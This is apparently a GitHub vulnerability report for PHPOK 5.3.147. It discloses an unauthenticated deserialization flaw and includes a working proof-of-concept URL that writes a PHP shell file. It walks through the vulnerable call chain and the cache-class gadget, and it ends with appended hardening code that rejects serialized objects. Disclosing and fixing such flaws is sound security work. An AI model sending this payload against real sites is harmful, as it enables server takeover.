qinggan / phpok

This is an extremely flexible enterprise website program that supports all kinds of custom configuration, including global site parameters, category extensions, project extensions, and various models!
https://www.phpok.com
MIT License

PHPOK5.3 deserialization vulnerability to getshell #6

Closed awedxz closed 1 year ago

awedxz commented 4 years ago

PHPOK Version 5.3.147

poc

http://127.0.0.1:8000/5.3.147/api.php?c=call&f=index&data=%7B%22m_picplayer%22%3A%7B%22site%22%3A1%2C%22type_id%22%3A%22format_ext_all%22%2C%220%22%3A%7B%22form_type%22%3A%22url%22%2C%22content%22%3A%22O%3A5%3A%5C%22cache%5C%22%3A4%3A%7Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000folder%5C%22%3Bs%3A41%3A%5C%22php%3A%5C%2F%5C%2Ffilter%5C%2Fwrite%3Dstring.rot13%5C%2Fresource%3D%5C%22%3Bs%3A11%3A%5C%22%5Cu0000%2A%5Cu0000key_list%5C%22%3Bs%3A19%3A%5C%22%3C%3Fcuc+cucvasb%28%29%3B+%3F%3E%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000key_id%5C%22%3Bs%3A5%3A%5C%22shell%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000status%5C%22%3Bb%3A1%3B%7D%22%7D%7D%7D

analysis

framework/api/call_control.php::index_f

The front end can pass data in JSON format. After decoding, the controllable data is assigned to $tmpValue and then enters the phpok function.

framework/phpok_tpl_helper.php::phpok

$GLOBALS['app']->call->phpok($id,$ext) is phpok_call.php::phpok()

framework/phpok_call.php::phpok

$rs is completely controllable, so you can control $func, but there is a limitation:

if(!in_array($func,$this->mlist)){
    return false;
}

Dumping $this->mlist, we now know that all functions starting with _ in this class can be called, and I found that the _format_ext_all function is vulnerable.

framework/phpok_call.php::_format_ext_all

If you can control $value['content'], it leads to a deserialization vulnerability. $value comes from $rslist, $rslist from $call_rs, and $call_rs from the data we passed in.

popchain

framework/engine/cache.php::__destruct

framework/engine/cache.php::save

$this->folder is controllable, so we can use php://filter/write=string.rot13/resource= to bypass exit();

result

shell.php

<?cuc rkvg();?>f:19:"<?php phpinfo(); ?>";
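As an added illustration of the fix a maintainer would apply at the unserialize() call in _format_ext_all (example code written for this note, not PHPOK's own; the function names safe_unserialize_content and contains_incomplete_class are hypothetical): restrict unserialize() to scalars and arrays with allowed_classes => false, so a serialized cache object is never instantiated and its __destruct/save chain never runs.

```php
<?php
// Hypothetical hardened decoding step for $value['content'] (not PHPOK's code).
// Returns the decoded scalar/array, or null when the payload tried to smuggle an object.
function safe_unserialize_content(string $content)
{
    // allowed_classes => false: every "O:" record becomes __PHP_Incomplete_Class,
    // so no application class (such as cache, with its __destruct) is instantiated.
    $decoded = @unserialize($content, ['allowed_classes' => false]);
    if ($decoded === false && $content !== serialize(false)) {
        return null; // malformed serialized data
    }
    if (contains_incomplete_class($decoded)) {
        return null; // reject anything that carried an object, even nested in arrays
    }
    return $decoded;
}

// Recursively look for placeholder objects left behind by allowed_classes => false.
function contains_incomplete_class($v): bool
{
    if ($v instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($v)) {
        foreach ($v as $item) {
            if (contains_incomplete_class($item)) {
                return true;
            }
        }
    }
    return false;
}

// Constructed sample inputs: a benign array such as the url form type would carry,
// and a serialized object using the class name from the report. The class is not
// defined in this script and is never instantiated, so the second sample is inert.
$benign  = serialize(['form_type' => 'url', 'content' => 'https://example.invalid/a.jpg']);
$hostile = 'O:5:"cache":1:{s:9:"' . "\0*\0" . 'folder";s:4:"/tmp";}';

// The benign input decodes to its array; the hostile input is rejected with null.
var_dump(safe_unserialize_content($benign));
var_dump(safe_unserialize_content($hostile));
```

Adding the option is not a complete fix on its own: the surrounding check is still needed because allowed_classes => false turns objects into __PHP_Incomplete_Class placeholders rather than raising an error.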